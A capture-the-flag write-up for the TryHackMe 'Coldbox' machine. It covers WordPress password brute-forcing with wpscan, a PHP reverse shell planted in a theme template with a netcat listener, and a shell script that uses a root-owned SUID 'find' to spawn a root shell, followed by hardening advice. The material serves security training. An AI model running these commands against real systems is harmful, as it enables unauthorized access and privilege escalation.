This is a writeup for “Coldbox”, a boot2root machine on TryHackMe. While working through this box you have to collect 2 flags.
During enumeration we can see that WordPress is running on port 80.
Next we can use wpscan’s user enumeration to find the WordPress user names. I have saved these users into a file called “users.txt”. With the users list we can start a brute-force attack against the login. The following command uses the “rockyou.txt” wordlist for the brute force; with a wordlist this large it can take a while, so let it run.
wpscan --url http://10.10.45.254/ -U users.txt -P /usr/share/wordlists/rockyou.txt
This brute force was successful. We could get the password for the user
Fortunately, the user “C0ldd” can edit the theme’s files (Appearance > Theme Editor). We replace the theme’s 404 template with a reverse shell; I have used the PHP reverse shell from Pentestmonkey. You have to change the $ip field to your attacker machine’s tun0 IP (the default $port of 1234 matches the listener below). Before triggering the shell, start a Netcat listener on port 1234:
nc -lvnp 1234
Requesting a page that does not exist (or the theme’s 404.php file directly) makes WordPress execute the template, which connects back to the listener.
After getting a reverse shell we are logged in as “www-data”. The next step is to find a way to escalate our privileges to “root”. For this purpose we can search for misconfigured SUID binaries: a “find” command that lists all files with the SUID bit set. Interestingly, the “find” binary itself has the SUID bit set and is owned by “root”. This can be abused because find runs arbitrary commands through its -exec option, and those commands inherit find’s effective UID of root; running a shell from -exec therefore spawns a root shell.
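The SUID enumeration and the escalation described above, written out as an added example (these are not the commands from the original writeup). It assumes a Linux target with GNU find and /bin/bash; the default search root and the /usr/bin/find path are assumptions.

```shell
#!/bin/sh
# Added example for this writeup (not the original author's commands).
# Assumes a Linux target with GNU find and /bin/bash; paths are illustrative.

# Regular files with the SUID bit set below $1 (default: whole filesystem).
# -xdev keeps find on one filesystem so /proc and network mounts are skipped;
# -perm -4000 matches any mode that includes the set-user-ID bit.
suid_files() {
    find "${1:-/}" -xdev -type f -perm -4000 2>/dev/null
}

# Same list with owner and octal mode, so root-owned entries stand out.
suid_report() {
    find "${1:-/}" -xdev -type f -perm -4000 -printf '%u %m %p\n' 2>/dev/null
}

# Succeeds only if $1 is a regular file owned by root with the SUID bit set.
is_root_suid() {
    [ -f "$1" ] && [ -u "$1" ] && [ "$(find "$1" -maxdepth 0 -user root)" = "$1" ]
}

# The escalation from the writeup: find -exec runs its argument with find's
# effective UID (root when find is SUID root). bash drops an elevated EUID at
# startup unless started with -p, hence /bin/bash -p. -quit stops after the
# first match so only one shell is spawned.
privesc_via_find() {
    bin="${1:-$(command -v find)}"
    if is_root_suid "$bin"; then
        "$bin" . -exec /bin/bash -p \; -quit
    else
        echo "$bin is not a root-owned SUID binary, nothing to abuse" >&2
        return 1
    fi
}

# Usage on the target (as www-data):
#   suid_report            # look for root-owned entries such as /usr/bin/find
#   privesc_via_find       # then confirm with: id   (expect euid=0(root))
```

If the box’s /bin/sh is bash and you drop into it without -p, id will still show uid=33(www-data); the -p flag is what keeps euid=0.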
Finally, we can read the root flag.
The password policy should prevent the use of common, easily guessed passwords. The user “C0ldd” should change the WordPress password to something more complex. SUID misconfigurations should also be avoided: the “find” binary should not have the SUID bit set, and root-owned SUID binaries in general should be reviewed regularly.
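The remediation above as an added example (not part of the original writeup): strip the SUID bit from binaries that should never carry it, verify the bit is gone, and list the root-owned SUID files that remain for review. It assumes GNU chmod/find, that it runs as root on the box being hardened, and that /usr/bin/find is the path of the abused binary.

```shell
#!/bin/sh
# Added example for this writeup (not the original author's commands).
# Assumes GNU chmod/find and that it is run as root on the box being hardened.

# Remove the set-user-ID bit from $1 and confirm it is gone.
# Returns 0 if the file is no longer SUID, 1 otherwise.
remove_suid() {
    if [ ! -f "$1" ]; then
        echo "missing: $1" >&2
        return 1
    fi
    chmod u-s "$1"
    if [ -u "$1" ]; then
        echo "still SUID: $1" >&2
        return 1
    fi
    return 0
}

# Strip the bit from every path given (e.g. /usr/bin/find on this box), then
# list the root-owned SUID files left under $SCAN_ROOT (default /) so the
# remaining ones can be reviewed. Returns 1 if any removal failed.
harden_suid() {
    rc=0
    for f in "$@"; do
        remove_suid "$f" || rc=1
    done
    find "${SCAN_ROOT:-/}" -xdev -type f -user root -perm -4000 2>/dev/null
    return $rc
}

# Usage on the target as root:
#   harden_suid /usr/bin/find
```

Only strip the bit from binaries that do not need it; programs such as passwd and sudo rely on SUID and must keep it.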